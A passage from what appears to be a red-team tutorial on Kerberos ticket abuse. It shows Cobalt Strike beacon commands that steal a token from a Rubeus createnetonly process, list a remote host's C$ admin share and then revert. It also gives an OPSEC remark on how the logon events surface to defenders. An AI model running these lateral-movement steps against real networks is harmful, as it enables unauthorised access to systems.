Rubeus triage will now show the users TGT inside this LUID.
Impersonate the Process created with createnetonly
The final step is to impersonate the process we created using Rubeus' createnetonly command. We can do so using the process ID.
beacon> steal_token 4748
beacon> ls \\internal-website.rotta.dev\c$
[*] Listing: \\internal-website.rotta.dev\c$\
Size Type Last Modified Name
---- ---- ------------- ----
dir 08/15/2024 11:30:11 $Recycle.Bin
dir 08/10/2024 11:45:28 $WinREAgent
Drop Impersonation
beacon> rev2self
beacon> kill 4748
OPSEC
By default Rubeus uses a random username, domain, and password with CreateProcessWithLogonW API. The "Suspicious Logon Events" saved search will show 4624's and the value will be noticeable by blue team as it is not expected.